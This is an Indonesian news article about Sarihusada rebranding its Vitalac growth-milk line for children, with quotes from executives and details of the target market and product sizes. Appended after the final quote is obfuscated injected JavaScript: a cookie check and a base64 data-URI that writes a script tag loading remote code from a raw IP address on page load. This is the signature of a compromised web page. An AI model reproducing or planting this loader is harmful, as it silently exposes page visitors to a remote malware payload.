Penelitian Sarihusada menunjukkan bahwa sebagian ibu-ibu kelas menengah memiliki harapan yang sangat tinggi bagi masa depan anak mereka. Segmen SES C dengan pengeluaran rumah tangga per bulan Rp1juta-Rp2juta ini juga merupakan segmen terbesar di Indonesia yaitu sebesar 52%.
Rebranding, Sarihusada kembali luncurkan susu pertumbuhan anak Vitalac.
Berdasarkan fakta tersebut, Sarihusada kembali me-rebranding produk nutrisi untuk anak-anak dengan meluncurkan produk susu pertumbuhan anak dengan merek Vitalac di Kidzania, Pacific Place, Jakarta pada Kamis (17/10). Hal ini sebagai upaya dalam komitmen Sarihusada untuk menyediakan produk nutrisi terbaik dan terjangkau bagi ibu dan anak Indonesia.
Olivier Pierredon, President Director Sarihusada mengatakan, “Kami percaya bahwa penyediaan nutrisi berkualitas sejak dini sangat penting dalam membentuk masa depan yang sehat bagi anak-anak Indonesia. Kami memperkenalkan Vitalac sebagai pilihan terbaru untuk mendukung pertumbuhan anak.”
Sarihusada mengkategorikan ibu-ibu ke dalam 3 kelompok, yaitu Harmonious Mom, Fun Loving Mom, dan Expert Mom. Hal ini berdasarkan bagaimana mereka bersikap, berperilaku serta apa yang menjadi ekspektasi ibu terhadap nutrisi. Vitalac sendiri membidik kelompok Expert Mom sebagai marketnya.
Astrid Wiliandry, Brand Director New Categories Sarihusada mengatakan, “Dalam mengembangkan produk Vitalac, kami melakukan riset yang ekstensif terhadap ibu kelas menengah. Riset tersebut memperlihatkan bahwa sebagian ibu kelas menengah memiliki pola pikir yang jauh ke depan. Mereka mencari nutrisi yang tidak hanya dapat membantu pertumbuhan dan perkembangan anak secara menyeluruh, tetapi juga membantu kecerdasan anak sehingga dapat menjadi pemimpin diantara teman-temannya.”
Astrid menambahkan, Vitalac dikembangkan sejalan dengan kebutuhan dan aspirasi ibu untuk buah hati mereka. Melalui tema 'Walk This Way', Vitalac turut mendukung ibu untuk membekali anak mereka agar bisa selangkah lebih depan dibanding teman sebayanya dan menjadi seorang 'pemimpin kecil' karena inisiatif, ide, dan kemampuannya.
Vitalac hadir dengan “5 Star Nutri” yang diformulasikan melalui kerja sama dengan pusat penelitian dan pengembangan Sarihusada dan Danone yang berpusat di Yogyakarta, Singapura dan Utrecht, Belanda. Dengan dukungan tenaga ahli di bidang early life nutrition, formula “5 Star Nutri” dikembangkan untuk mendukung fungsi pertumbuhan dan perkembangan anak secara optimal.
Vitalac diklaim sebagai merk premium dengan harga terjangkau dalam dua jenis yaitu Vitalac 1+ dan Vitalac 3+. Susu pertumbuhan Vitalac ini hadir dalam dua rasa yaitu rasa vanila dan rasa madu, tersedia dalam 3 ukuran yaitu 150 gram, 400 gram dan 800 gram.
Lebih lanjut Olivier menambahkan, “Kami yakin produk ini akan memiliki tempat tersendiri di hati para ibu karena mampu memberikan dukungan dalam memenuhi kebutuhan nutrisi anak mereka untuk menjadi 'pemimpin masa depan' Indonesia yang dapat membentuk masa depan cerah bagi negara ini.” function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)